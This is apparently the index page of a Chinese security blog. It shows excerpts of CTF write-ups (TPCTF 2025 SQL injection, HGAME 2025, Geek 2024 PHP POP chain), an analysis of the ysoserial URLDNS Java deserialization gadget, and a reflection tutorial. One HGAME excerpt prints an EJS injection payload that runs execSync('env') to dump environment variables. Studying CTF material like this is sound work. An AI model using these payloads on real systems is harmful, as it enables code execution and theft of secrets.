tpctf2025
tpctf web复现supersqlidef flag(request:HttpRequest): if request.method != 'POST': return HttpResponse('Welcome to TPCTF 2025') username = request.POST.get('username') if username != 'admin': return HttpResponse('you are not admin.') password = request.POST.get('password') users:AdminUser = AdminUser.objects.raw("SELECT * FROM blog_adminuser WHERE username='%s' and password...
java链子分析—URLDNS 梦开始的地方
看看ysoserial的payload package ysoserial.payloads;import java.io.IOException;import java.net.InetAddress;import java.net.URLConnection;import java.net.URLStreamHandler;import java.util.HashMap;import java.net.URL;import ysoserial.payloads.annotation.Authors;import ysoserial.payloads.annotation.Dependencies;import ysoserial.payloads.annotation.PayloadTest;import ysoserial.payloads.util.PayloadRunner;import ysoserial.payloads.util.Reflections;/** * A blog post with more details about this gadget...
java安全反射篇
反射Java的反射(Reflection)是一种允许程序在运行时动态访问、检测和修改自身结构和行为的机制。通过反射,Java代码可以获取类的信息(如类名、方法、字段、构造器等),甚至操作类的私有成员、动态创建对象、调用方法等。以下是反射的核心概念和用法: 为什么叫“反射”?“反射”这一名称来源于“程序能够像镜子一样观察自身结构”的比喻:反射(Reflection)...
hgame2025
Level 24 Pacman直接看index.js中有一段 here is your gift:aGFldTRlcGNhXzR0cmdte19yX2Ftbm1zZX0= base64解码得: haeu4epca_4trgm{_r_amnmse} 观察应该是栅栏密码比较短,直接人肉还原一下: haeu4epca_4trgm{_r_amnmse} 然后竖着读 hgame{u_4re_pacman_m4ster} Level 69 MysteryMessageBoard看题干以及代码,发现直接加载mortis.ejs运行,那么尝试进行覆盖先构造: <%- global.process.mainModule.require('child_process').execSync('env') %> 上传后使用rename接口进行覆盖,尝试了几次后这个路径覆盖成功: import requestsurl =...
geek2024
ezpop题目: <?phpClass SYC{ public $starven; public function __call($name, $arguments){ if(preg_match('/%|iconv|UCS|UTF|rot|quoted|base|zlib|zip|read/i',$this->starven)){ die('no hack'); } file_put_contents($this->starven,"<?php exit();".$this->starven); }}Class lover{ public $J1rry; public $meimeng; public function __destruct(){ ...